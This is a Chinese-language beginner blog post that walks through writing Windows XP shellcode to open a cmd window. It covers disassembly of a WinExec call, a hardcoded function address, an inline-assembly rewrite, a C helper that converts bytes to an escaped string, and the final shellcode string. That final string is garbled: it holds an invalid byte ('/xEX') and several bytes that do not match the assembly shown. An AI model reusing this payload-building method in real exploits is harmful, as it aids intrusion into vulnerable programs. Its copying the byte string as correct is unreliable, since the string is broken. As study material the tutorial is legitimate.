学步园

很久没有写博客了，今天写写一个以前没有写过的话题，缓冲区溢出shellcode编写。

我是菜鸟，以前没有写过shellcode，最近也在忙着网络的渗透，栈溢出也是零零碎碎的看到一些知识，大牛飘过，菜鸟言论仅供娱乐。

大家同是菜鸟的人可以看看，我是站在初学者的角度写这篇文章的，所以初学者应该比较容易理解。

对于一些复杂的shellcodet我们暂且先不谈，我们先来看看自己编写一个打开cmd窗口的shellcode。其实黑客防线上有位大神执笔写了一系列exploit的编写，有兴趣的人自己去看看。

首先我们需要了解一下windows的运行机制。我们先写一个简单的开启本地cmd窗口的程序：

 #include<windows.h><br /> Void main()<br /> {<br /> WinExec(“cmd.exe”,1);<br /> }<br />

在Visual C++上按F10进入反汇编代码:

1:#include”windows.h”<br /> 2:void main()<br /> 3: {<br /> 00401010 push ebp<br /> 00401011 mov ebp,esp<br /> 00401013 sub esp,40h<br /> 00401016 push ebx<br /> 00401017 push esi<br /> 00401018 push edi<br /> 00401019 lea edi,[ebp-40h]<br /> 0040101C mov ecx,10h<br /> 00401021 mov eax,0CCCCCCCCh<br /> 00401026 rep stos dword ptr [edi]<br /> 4: WinExec("cmd.exe",1);<br /> 00401028 mov esi,esp<br /> 0040102A push 1<br /> 0040102C push offset string "cmd.exe" (0041f01c)<br /> 00401031 call dword ptr [__imp__WinExec@8 (0042413c)]<br /> 00401037 cmp esi,esp<br /> 00401039 call __chkesp (00401070)<br /> 5: }<br />

通过这个程序我们可以清楚的看到计算机在调用WinExec函数的时候是先把两个参数从右至左一次压入栈，然后调用call函数转到WinExec的地址去。但是要注意的是call函数除了实现地址的跳转还有一点就是把当前的EIP压入栈。

对于shellcode是机器码，大多数人看到都会晕乎乎的，但是不用怕，我们所要做的工作不是用机器码写这一大堆东西，这些计算机已经为我们做的很好了，我们所要做的就是用汇编甚至是高级语言写下我们要实现的代码。

但目前其实目的已经很明确，我们要调用WinExec函数就要知道在不同系统中WinExec函数所在的地址，那么用什么方法知道这个函数所在的地址呢？这里我介绍一种非常简便的办法，使用vc自带的depends工具。打开Depends，随便拖一个PE文件进去如下图：

我们可以看到KERNEL.DLL的入口地址是0x7c800000而WinExec的入口地址是0x0006250D那么WinExec的地址就出来了两个相加得到0x7C86250D，这个方法是不是很简单？另外本菜鸟使用的是windows XP sp3不同的系统可能有所不同。

有了入口地址，我们可以用汇编来编写我们的shellcode，

#include<windows.h><br /> void main()<br /> {<br /> _asm<br /> {<br /> push ebp<br /> mov ebp,esp<br /> xor edi,edi<br /> push edi<br /> sub esp,04h<br /> mov [ebp-08h],63h<br /> mov [ebp-07h],6Dh<br /> mov [ebp-06h],64h<br /> mov [ebp-05h],2Eh<br /> mov [ebp-04h],65h<br /> mov [ebp-03h],78h<br /> mov [ebp-02h],65h<br /> push 1 //压入第一个参数<br /> lea eax,[ebp-08h]<br /> push eax //压入第二个参数<br /> mov edx,0x7C86250D<br /> call edx //调用WinExec<br /> leave<br /> };<br /> }<br />

按F10进入反汇编调试器中，在按Alt+8看到汇编代码，此时并没有机器码啊，别着急，在空白的地方右击出现的下拉菜单中选中Code Byte一项。看看出现了什么？在每一行汇编代码前出现了机器码！如下图

下面要做的工作就是把这些机器码抄下来了，这个是体力活。直接抄在一起比如：558BEC83EC……那么我们还要在每两个字母前手动添加/x么？当然不用，写一个小程序，一劳永逸：

#include "stdio.h"<br /> #include "stdlib.h"<br /> int main()<br /> {<br /> FILE *fp1=NULL,*fp2=NULL;<br /> char ch,filename[20]={0};<br /> printf("请输入文件路径：(注意字符转义)/n");<br /> scanf("%s",filename);<br /> if((fp1=fopen(filename,"rb"))==NULL)<br /> {<br /> printf("不能读取文件！/n");<br /> exit(0);<br /> }<br /> if((fp2=fopen("d://shellcode.txt","w+"))==NULL)<br /> {<br /> printf("不能写入文件！/n");<br /> exit(0);<br /> }<br /> while (!feof(fp1))<br /> {<br /> ch=fgetc(fp1);<br /> fputc('//',fp2);<br /> fputc('x',fp2);<br /> fputc(ch,fp2);<br /> ch=fgetc(fp1);<br /> fputc(ch,fp2);<br /> }<br /> printf("转换成功！");<br /> fclose(fp1);<br /> fclose(fp2);<br /> return 0;</p> <p>}<br />

最终转换的shellcode就是

/x55/x8B/xEX/x83/xEC/x40/x53/x56/x57/x8D/x7D/xC0/xB9/x10/x11/x11/x11/xB8/xCC/xCC/xCC/xCC/xF3/x1B/x55/x8B/xEC/x33/xFF/x57/x83/xEC/x04/xC6/x45/xF8/x63/xC6/x45/xF9/x6D/xC6/x45/xFA/x64/xC6/x45/xFB/x2E/xC6/x45/xFC/x65/xC6/x45/xFD/x78/xC6/x45/xFE/x65/x6A/x01/x8D/x45/xF8/x50/xBA/x0D/x25/x86/x7C/xFF/xD2/xC9

到这里该讲的都讲完了，还是那一句话，菜鸟言论，大牛飘过。。。